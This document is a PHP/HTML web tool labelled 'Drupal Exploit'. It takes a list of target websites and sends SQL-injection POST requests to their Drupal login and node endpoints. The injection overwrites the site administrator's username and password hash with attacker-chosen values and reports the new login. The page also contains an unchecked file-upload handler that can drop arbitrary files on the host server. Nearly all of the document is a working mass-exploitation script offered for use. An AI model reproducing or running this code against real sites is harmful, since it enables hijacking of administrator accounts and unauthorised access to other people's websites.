Drupal msc

1. <!Doctype HTML>
2. <html>
3. <style type="text/css">* {cursor: url(http://ani.cursors-4u.net/cursors/cur-13/cur1156.ani), url(http://ani.cursors-4u.net/cursors/cur-13/cur1156.png), auto !important;}</style><a href="http://www.cursors-4u.com/cursor/2018/03/07/turquoise-electricity-lightning.html" target="_blank" title="Turquoise Electricity Lightning"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Turquoise Electricity Lightning" style="position:absolute; top: 0px; right: 0px;" /></a>
4. <head>
5. <title>Drupal Exploit</title>
6. <body bgcolor="#000" marginwidth="0" marginheight="0" style="background: black url(https://i.gifer.com/PNwl.gif) no-repeat center center fixed; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size:cover;" onload="type_text()" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0"> <link rel="stylesheet" type="text/css" href="http://magelliott.com/images/comment_images/tolol.css">
7. <style type="text/css">
8. <head>
9. </style>
10. <style type="text/css">
11. .mymargin{
12. margin-top:30px;
13. font-family: monospace;
14. }
15. body, html {
16. background-color:black;
17. text-align: center;
18. color: #008000;
19. margin: 10px auto;
20. }
21. a {
22. color: lime;
23. text-decoration: none;
24. }
25. </style>
26. </head>
27. <body>
28. <center><font face="Iceland" size="4px" color="lime">Drupal Exploit - Majalengka Security Cyber</font><br>
29. <center>
30. <div class="mymargin">
31. <center>
32. <form method="POST" action="">
33. <font color='#00FFFF'>WebSite :</font> <br>
34. <textarea name="url" placeholder="Example: www.sitetarget.com" style="resize: none; border: 1px solid #FF1493; color: #00FFFF; background: transparent; margin: 5px auto; padding-left: 5px; width: 500px; height: 250px;"></textarea><br>
35. <input style="border: 1px solid #FF1493; color: #00FFFF; background: transparent; margin: 5px; width: 350px; height: 25px;" size="50" type="submit" name="submit" value="Attack">
36. </form>
37. <br>
38. <?php
39. /* Created by Xwizx404
40. error_reporting(0);
41. $submit = $_POST['submit'];
42. $url = explode("\r\n", $_POST['url']);
43. if($submit) {
44. foreach($url as $sites) {
45. $log = "/user/login";
46. $holako = "/?q=user";
47. $post_data = "name[0;update users set name %3D 'sjteam' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
48. $params = array(
49. 'http' => array(
50. 'method' => 'POST',
51. 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
52. 'content' => $post_data
53. )
54. );
55. $ctx = stream_context_create($params);
56. $data = file_get_contents($sites . '/user/login/', null, $ctx);
57. echo "<u>Testing user/login</u><br>";
58. if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
59. echo "Scanning: <font color=lime>$sites</font><br>";
60. echo "Status: Successfully Xploited!<br>";
61. echo "Data=> user: <font color='#ff3'>sjteam</font> | pass: <font color='#ff3'>admin</font><br>";
62. echo "Login: <a href='$sites$log' target='_blank' style='text-decoration: none'>$sites$log</a><br><br>";
63. } else {
64. echo "Scanning: <font color=lime>$sites</font><br>";
65. echo "Status: <font color=red>Not Xploited!</font><br><br>";
66. }
67. }
68. }
69. if($submit) {
70. foreach($url as $sites) {
71. $post_data = "name[0;update users set name %3D 'sjteam' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
72. $params = array(
73. 'http' => array(
74. 'method' => 'POST',
75. 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
76. 'content' => $post_data
77. )
78. );
79. $ctx = stream_context_create($params);
80. $data = file_get_contents($sites . '?q=node&destination=node', null, $ctx);
81. echo '<u>Testing at Index</u><br>';
82. if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
83. echo "Scanning: <font color=lime>$sites</font><br>";
84. echo "Status: Successfully Xploited!<br>";
85. echo "Data => user: <font color='#ff3'>sjteam</font> | pass: <font color='#ff3'>admin</font><br>";
86. echo "Login: <a href='$sites$log' target='_blank' style='text-decoration: none'>$sites$log</a><br><br>";
87. } else {
88. echo "Scanning: <font color=lime>$sites</font><br>";
89. echo "Status: <font color=red>Not Xploited!</font><br><br>";
90. }
91. }
92. }
93. ?>
94. </div>
95. <?php
96.  
97. $Drupal = $_POST['Drupal'];
98.  
99.  
100. if($Drupal == 'Drupal') {
101.  
102. $filename = $_FILES['file']['name'];
103. $filetmp = $_FILES['file']['tmp_name'];
104.  
105. echo "<form method='POST' enctype='multipart/form-data'>
106. <input type='file'name='file' />
107. <input type='submit' value='go' />
108.  
109. </form>";
110. move_uploaded_file($filetmp,$filename);
111. }
112. ?>
113. </body>
114. </html>